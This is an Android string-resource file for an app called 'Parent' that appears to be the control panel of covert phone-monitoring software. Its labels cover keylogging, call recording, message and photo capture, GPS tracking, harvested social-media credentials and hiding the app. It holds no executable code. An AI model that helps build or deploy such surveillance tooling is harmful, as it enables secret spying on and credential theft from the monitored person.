<resources>
    <string name="app_name">Parent</string>

    <string name="ID_ADMOB">YOU_ID_ADMOB</string>
    <string name="banner_ad_unit_id">YOU_ID_BANNER</string>
    <string name="APY_KEY_MAPS">YOU_API_KEY_MAPS</string>

    <string name="duration_default">0:00</string>
    <string name="login_hint_user">Email</string>
    <string name="login_hint_passw">Password</string>
    <string name="login_hint_passw_repeat">Password repeat</string>
    <string name="login_btn_sign_in">SIGN IN</string>
    <string name="login_btn_sign_up">SIGN UP</string>
    <string name="login_txt_sign_up">No account yet? sign up</string>
    <string name="login_success">Login success</string>
    <string name="login_failed_try_again_later">Login failed please try again later</string>
    <string name="login_failed">Login failed</string>
    <string name="sign_up_failed">Sign up failed</string>
    <string name="sign_up_failed_try_again_later">Sign up failed please try again later</string>
    <string name="register_pass_match">Passwords do not match</string>
    <string name="logging_in">Logging in</string>
    <string name="maps">Location</string>
    <string name="calls">Calls</string>
    <string name="messages">Messages</string>
    <string name="photographic">Get photo</string>
    <string name="sign_out">Sign out</string>
    <string name="show_app">Show App</string>
    <string name="hide_app">Hide App</string>
    <string name="failed_calls_audios">Failed when getting call audios</string>
    <string name="failed_sms">Failed when getting messages</string>
    <string name="failed_photo">Failed when getting photos</string>
    <string name="failed_social">Failed when getting credentials</string>
    <string name="failed_keys_text">Failed when getting keyLog</string>
    <string name="not_have_audios_yet">You do not have audios yet.</string>
    <string name="not_have_sms_yet">You do not have messages yet.</string>
    <string name="not_have_key_text">You do not have keyLog.</string>
    <string name="not_have_photo_yet">You do not have photos yet.</string>
    <string name="keylog">KeyLog</string>
    <string name="social">Social</string>
    <string name="setting">Setting</string>
    <string name="enable_keylogger">Enabled KeyLogger:</string>
    <string name="clear_keylogger_list">Clear KeyLogger list</string>
    <string name="clear_calls_list">Clear calls list</string>
    <string name="clear_sms_list">Clear messages list</string>
    <string name="clear_photo_list">Clear photos list</string>
    <string name="clear_social_credentials">Clear social credentials</string>
    <string name="closed_for_inactivity">Closed for inactivity</string>
    <string name="enable_gps">Enable GPS:</string>
    <string name="enable_photo">Enable get Photo:</string>
    <string name="enable_permission">Enable permission:</string>
    <string name="failed_delete_file">Failed to delete the file</string>
    <string name="failed_delete_files">Failed to delete files</string>
    <string name="delete">Delete</string>
    <string name="clear">Clear</string>
    <string name="title_dialog">Message</string>
    <string name="message_dialog_delete_call_audio">Do you want to delete call audio?</string>
    <string name="message_dialog_delete_photo">Do you want to delete photo?</string>
    <string name="message_dialog_delete_sms">Do you want to delete message?</string>
    <string name="message_dialog_clear_calls">Do you want to clear call list?</string>
    <string name="message_dialog_clear_photos">Do you want to clear photo list?</string>
    <string name="message_dialog_clear_credentials">Do you want to clear social credentials?</string>
    <string name="message_dialog_clear_sms">Do you want to clear messages list?</string>
    <string name="message_dialog_clear_keylogger">Do you want to clear keylogger list?</string>
    <string name="go_to_setting">Go to setting</string>
    <string name="message_permission">Permission is required to read/write storage for this application.</string>
    <string name="message_permission_never_ask_again">The storage permission was denied, without it the application will not work correctly. To activate them you must go to \"Settings - applications - IsTheApp - permissions\" and activate the corresponding permissions. Do you want to activate them now?</string>
    <string name="get_front_photo">Get front photo</string>
    <string name="get_rear_photo">Get rear photo</string>
    <string name="nav_delete_photo">Delete photo</string>
    <string name="nav_download_photo">Download photo</string>
    <string name="ops">Oops! 😢</string>
    <string name="oops">Oops!</string>
    <string name="message_dialog_permission_photo_disable">The permission to obtain photos has been disabled.</string>
    <string name="message_permission_social_disable">The permission to obtain credentials has been disabled.</string>
    <string name="put_your_access_code">Put your access code</string>
    <string name="enable_code_access">Enable access code</string>
    <string name="change_code_access">Change access code</string>
    <string name="change">Change</string>
    <string name="note_code_access">Note: if you forgot the code, you will have to delete and reinstall the application.</string>
    <string name="lock_screen">Lock app</string>
    <string name="finish_application_for_inactivity">End application by inactivity</string>
    <string name="enable_app_finish">Enable app finish</string>
    <string name="change_app_finish_time">Change app finish time</string>
    <string name="assigns_a_time_interval_to_terminate_the_application_due_to_inactivity">Assigns a time interval to terminate the application due to inactivity.  It may be necessary to restart the application to take effect.</string>
    <string name="current_access_code">Current access code</string>
    <string name="new_access_code">New access code</string>
    <string name="repeat_new_access_code">Repeat new access code</string>
    <string name="one_minute">1 minute</string>
    <string name="two_minute">2 minute</string>
    <string name="five_minute">5 minute</string>
    <string name="error_code_access">Enter 4-digit code</string>
    <string name="error_current_code_access">Incorrect current code</string>
    <string name="error_not_match_code_access">The access codes do not match</string>
    <string name="error_database_connection">Error establishing a database connection.</string>
    <string name="credentials">Credentials</string>
    <string name="email">User:</string>
    <string name="password">Password:</string>
    <string name="ellipsis">…</string>
    <string name="volume_up">Please turn the volume up</string>
</resources>
